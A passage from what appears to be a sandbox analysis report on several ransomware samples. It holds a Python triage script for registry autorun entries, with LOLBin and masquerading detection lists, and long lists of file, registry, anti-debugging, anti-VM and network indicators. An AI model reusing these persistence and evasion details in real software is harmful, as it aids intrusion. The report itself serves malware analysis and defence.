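    r'Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\Desktop\\00403\\HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe\"" HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe',
]

# key (may contain spaces) = "value data" writer-process
ROW_RE = re.compile(r'^Set value \(str\) (\\REGISTRY\\.+?) = "(.*)" (\S+)$')
INTERPRETERS = {"wscript", "wscript.exe", "cscript", "cscript.exe", "mshta.exe",
                "cmd", "cmd.exe", "command.com", "rundll32.exe", "regsvr32.exe"}
SYSTEM_BINARY_NAMES = {"powershell.exe", "csrss.exe", "svchost.exe", "explorer.exe",
                       "lsass.exe", "winlogon.exe", "services.exe", "smss.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TRUSTED_DIRS = SYSTEM_DIRS + ("c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = re.compile(r"^(c:\\users\\|c:\\programdata\\|c:\\windows\\temp\\)", re.I)


@dataclass
class Autorun:
    scope: str        # "user" (HKCU) or "machine" (HKLM)
    value_name: str
    command: str      # unescaped command line stored in the value
    target: str       # program the command launches
    writer: str       # process that wrote the value
    flags: list


def unescape(data):
    # Undo the report's escaping of quotes and backslashes inside the value data.
    return data.replace('\\"', '"').replace('\\\\', '\\')


def first_token(command):
    """Split a command line into (program, arguments), honouring a quoted program path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return (command[1:], "") if end == -1 else (command[1:end], command[end + 1:].strip())
    head, _, rest = command.partition(" ")
    return head, rest.strip()


def path_flag(path):
    p = path.lower()
    if USER_WRITABLE.match(p):
        return "user-writable location"
    if p.startswith(TRUSTED_DIRS):
        return None
    if re.match(r"^[a-z]:\\", p):
        return "non-standard directory"
    return None   # bare program name or switch: nothing to say about the path


def argument_tokens(args):
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', args)]


def triage_row(row):
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f"unrecognised row: {row[:40]}")
    key, raw_value, writer = m.groups()
    command = unescape(raw_value)
    target, args = first_token(command)
    name = target.rsplit("\\", 1)[-1].lower()
    flags = []
    if name in INTERPRETERS:
        flags.append("interpreter/LOLBin as autostart target")
    if (f := path_flag(target)):
        flags.append(f"target in {f}")
    for tok in argument_tokens(args):
        if (f := path_flag(tok)):
            flags.append(f"argument path in {f}")
            break
    if name in SYSTEM_BINARY_NAMES and not target.lower().startswith(SYSTEM_DIRS):
        flags.append("system-binary name outside System32/SysWOW64")
    scope = "machine" if key.upper().startswith("\\REGISTRY\\MACHINE\\") else "user"
    return Autorun(scope, key.rsplit("\\", 1)[-1], command, target, writer, flags)


def triage_rows(rows):
    return [triage_row(r) for r in rows]


if __name__ == "__main__":
    for a in triage_rows(ROWS):
        print(f"[{a.scope}] {a.value_name!r} -> {a.target}  ({', '.join(a.flags)})")
```

Every one of the eight entries trips at least one flag; the two PowerShell.exe values and the csrss.exe value also trip the masquerading check, and the two HKLM entries (written by svchost.exe and by 497D8E.exe) are the ones that survive a user profile change. The RunOnce entry is a self-delete of the dropper from Temp rather than persistence, which is why the interpreter and argument-path flags are kept separate from the target-path flag.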
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

  pid   Process
  5296  powershell.exe
Drops desktop.ini file(s) (31 IoCs)
Ransomware encryptors walk every directory they can reach; the desktop.ini hits below are a by-product of that sweep over the standard user and Public folders rather than a technique in themselves.
  File opened for modification by HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe (30 files):
    C:\Users\Public\Downloads\desktop.ini
    C:\Users\Public\Pictures\desktop.ini
    C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini
    C:\Users\Admin\Videos\desktop.ini
    C:\Users\Admin\Saved Games\desktop.ini
    C:\Users\Admin\Desktop\desktop.ini
    C:\Users\Admin\Links\desktop.ini
    C:\Users\Public\Documents\desktop.ini
    C:\Users\Public\Music\desktop.ini
    C:\Users\Admin\3D Objects\desktop.ini
    C:\Users\Public\Libraries\desktop.ini
    C:\Users\Admin\Favorites\Links\desktop.ini
    C:\Users\Admin\Searches\desktop.ini
    C:\Users\Public\desktop.ini
    C:\Users\Admin\Downloads\desktop.ini
    C:\Users\Public\AccountPictures\desktop.ini
    C:\Program Files (x86)\desktop.ini
    C:\Users\Admin\Pictures\Saved Pictures\desktop.ini
    C:\Users\Admin\Documents\desktop.ini
    C:\Users\Admin\Pictures\desktop.ini
    C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
    C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
    C:\Users\Admin\Favorites\desktop.ini
    C:\Users\Admin\Music\desktop.ini
    C:\Users\Admin\OneDrive\desktop.ini
    C:\Users\Public\Desktop\desktop.ini
    C:\Users\Public\Videos\desktop.ini
    C:\Users\Admin\Pictures\Camera Roll\desktop.ini
    C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI
    C:\Users\Admin\Contacts\desktop.ini
  File opened for modification by HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe (1 file):
    F:\$RECYCLE.BIN\S-1-5-21-3227495264-2217614367-4027411560-1000\desktop.ini

Enumerates connected drives (3 TTPs, 1 IoC)
Attempts to read the root path of hard drives other than the default C: drive.
  description             ioc    Process
  File opened (read-only)  \??\F:  HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 1 IoC)
  flow  ioc
  349   discord.com

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  336   ipinfo.io
  337   ipinfo.io

Writes to the Master Boot Record (MBR) (1 TTP, 1 IoC)
Bootkits write to the MBR to gain persistence at a level below the operating system. For a ransomware "blocker" the same raw write to the boot disk can equally be an MBR-locker overwrite that replaces the boot code with a lock screen; either way the boot sector of this disk should be treated as untrusted.
  description                   ioc               Process
  File opened for modification  \??\PhysicalDrive0  Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
Drops file in System32 directory (64 IoCs)
Most of the paths written by CyberPunk2077.exe are existing 32-bit system binaries (explorer.exe, reg.exe, wscript.exe, Taskmgr.exe, WerFault.exe), so "File created" here means the sample is writing over them, which suggests file-infector behaviour rather than dropping new files. The four svchost.exe entries are the normal CryptnetUrlCache updates of the system profile.
  File created by CyberPunk2077.exe (60 files):
    C:\Windows\SysWOW64\CertEnrollCtrl.exe
    C:\Windows\SysWOW64\fontview.exe
    C:\Windows\SysWOW64\netbtugc.exe
    C:\Windows\SysWOW64\setupugc.exe
    C:\Windows\SysWOW64\wlanext.exe
    C:\Windows\SysWOW64\@VpnToastIcon.png
    C:\Windows\SysWOW64\LaunchWinApp.exe
    C:\Windows\SysWOW64\cliconfg.exe
    C:\Windows\SysWOW64\clip.exe
    C:\Windows\SysWOW64\eventvwr.exe
    C:\Windows\SysWOW64\PickerHost.exe
    C:\Windows\SysWOW64\ReAgentc.exe
    C:\Windows\SysWOW64\Windows.Media.BackgroundPlayback.exe
    C:\Windows\SysWOW64\winrs.exe
    C:\Windows\SysWOW64\cmdkey.exe
    C:\Windows\SysWOW64\hdwwiz.exe
    C:\Windows\SysWOW64\msfeedssync.exe
    C:\Windows\SysWOW64\sdiagnhost.exe
    C:\Windows\SysWOW64\Taskmgr.exe
    C:\Windows\SysWOW64\user.exe
    C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\IME\IMETC\IMTCPROP.exe
    C:\Windows\SysWOW64\autoconv.exe
    C:\Windows\SysWOW64\cttunesvr.exe
    C:\Windows\SysWOW64\wscript.exe
    C:\Windows\SysWOW64\CloudNotifications.exe
    C:\Windows\SysWOW64\cscript.exe
    C:\Windows\SysWOW64\efsui.exe
    C:\Windows\SysWOW64\ieUnatt.exe
    C:\Windows\SysWOW64\mtstocom.exe
    C:\Windows\SysWOW64\systeminfo.exe
    C:\Windows\SysWOW64\verclsid.exe
    C:\Windows\SysWOW64\gpupdate.exe
    C:\Windows\SysWOW64\wbem\WMIADAP.exe
    C:\Windows\SysWOW64\MailContactsCalendarSync\LiveDomainList.txt
    C:\Windows\SysWOW64\@WirelessDisplayToast.png
    C:\Windows\SysWOW64\CredentialUIBroker.exe
    C:\Windows\SysWOW64\dplaysvr.exe
    C:\Windows\SysWOW64\SystemPropertiesRemote.exe
    C:\Windows\SysWOW64\wecutil.exe
    C:\Windows\SysWOW64\wevtutil.exe
    C:\Windows\SysWOW64\wiaacmgr.exe
    C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc
    C:\Windows\SysWOW64\@AppHelpToast.png
    C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\InfDefaultInstall.exe
    C:\Windows\SysWOW64\iscsicpl.exe
    C:\Windows\SysWOW64\OneDrive.ico
    C:\Windows\SysWOW64\F12\IEChooser.exe
    C:\Windows\SysWOW64\gpscript.exe
    C:\Windows\SysWOW64\reg.exe
    C:\Windows\SysWOW64\regsvr32.exe
    C:\Windows\SysWOW64\SystemPropertiesProtection.exe
    C:\Windows\SysWOW64\Speech_OneCore\Common\SpeechModelDownload.exe
    C:\Windows\SysWOW64\autochk.exe
    C:\Windows\SysWOW64\fixmapi.exe
    C:\Windows\SysWOW64\netiougc.exe
    C:\Windows\SysWOW64\recover.exe
    C:\Windows\SysWOW64\wextract.exe
    C:\Windows\SysWOW64\chkntfs.exe
  File opened for modification by svchost.exe (4 paths):
    C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache
    C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
    C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
    C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
Suspicious use of NtSetInformationThreadHideFromDebugger (64 IoCs)
NtSetInformationThread with the ThreadHideFromDebugger information class stops debug events from the calling thread reaching an attached debugger; it is a common anti-debugging check with no legitimate use in ordinary application code.
  pid   Process
  1264  Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe  (1 entry)
  4996  Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe  (1 entry)
  4728  Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe  (5 entries)
  5520  Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe  (1 entry)
  3088  HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe  (56 entries)
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target
PID 5892 set thread context of 6128 (pid 5892, Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe, procid_target 172)
A process calling SetThreadContext on a thread that belongs to another process is the hallmark of process hollowing or thread hijacking: PID 5892 redirected execution inside PID 6128, typically a child it created suspended. The code that actually runs therefore lives in 6128's memory, so that is the process to dump and to look for in the file and network events, not the Foreign.ofkr binary on disk. -
UPX packed file 20 IoCs
resource yara_rule
behavioral1/memory/1264-N-0x0000000010000000-0x000000001003D000-memory.dmp upx, for N in 258, 256, 254, 252, 248, 246, 244, 242, 241, 238, 236, 234, 232, 230, 229, 226, 225, 250, 223 (19 dumps of the same 0x3D000-byte region at 0x10000000 in PID 1264)
behavioral1/files/0x000700000002432f-4084.dat upx -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM. \??\VBoxMiniRdrDN is the device object of the VirtualBox shared-folder redirector, which exists only in a guest with Guest Additions installed, so a successful open of it tells the sample it is running under VirtualBox. The optical drive enumerated under "Checks SCSI registry key(s)" below identifies as QEMU, so this sandbox is most likely not VirtualBox and the open should have failed; what the sample did with that result is not recorded here and has to be read from its later behaviour.
description ioc Process
File opened (read-only) \??\VBoxMiniRdrDN HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-400_contrast-white.png CyberPunk2077.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest4-ppd.xrm-ms.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\Readme.README HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Review_RHP.aapp.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files (x86)\Common Files\System\fr-FR\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-200_contrast-black.png CyberPunk2077.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\Readme.README.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\ui-strings.js.pysa 
HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\CANYON.INF HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe.DEMON HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptyShare.scale-400.png CyberPunk2077.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\nashorn.jar.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\et\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-oob.xrm-ms.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-default.svg.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN026.XML.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File created C:\Program Files (x86)\Adobe\Acrobat 
Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireWideTile.scale-200.jpg HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-phn.xrm-ms HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-140.png.DEMON HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-100.png.DEMON.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-awt-j2se-1.3.2.jar.pysa.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\affDescription.txt.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\9.jpg HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program 
Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Logo.scale-100_contrast-white.png HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTrial-pl.xrm-ms HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\selector.js.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsSmallTile.scale-100.png CyberPunk2077.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\BKANT.TTF HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\readme.txt HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_de.properties.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\bcel.md.pysa.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader 
DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\Readme.README HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16EnterpriseVL_Bypass30-ppd.xrm-ms HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\ui-strings.js.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files\Microsoft Office\root\Office16\Document Parts\1033\16\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder-default.svg.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Restore-My-Files.txt HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-96_altform-unplated_contrast-black.png HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.HTM 
HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\msth8ES.LEX HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-72_altform-unplated_contrast-black.png CyberPunk2077.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-pl.xrm-ms.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\201.png CyberPunk2077.exe File created C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageMedTile.scale-200_contrast-white.png CyberPunk2077.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\local_policy.jar.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\Readme.README HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\UnlockResize.gif.LKEED.pysa HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification 
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter_18.svg.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-24_altform-lightunplated.png HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover.png.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailBadge.scale-100.png CyberPunk2077.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_RHP.aapp.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideLogo.scale-200_contrast-white.png CyberPunk2077.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] CyberPunk2077.exe 
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe CyberPunk2077.exe -
Drops file in Windows directory 64 IoCs
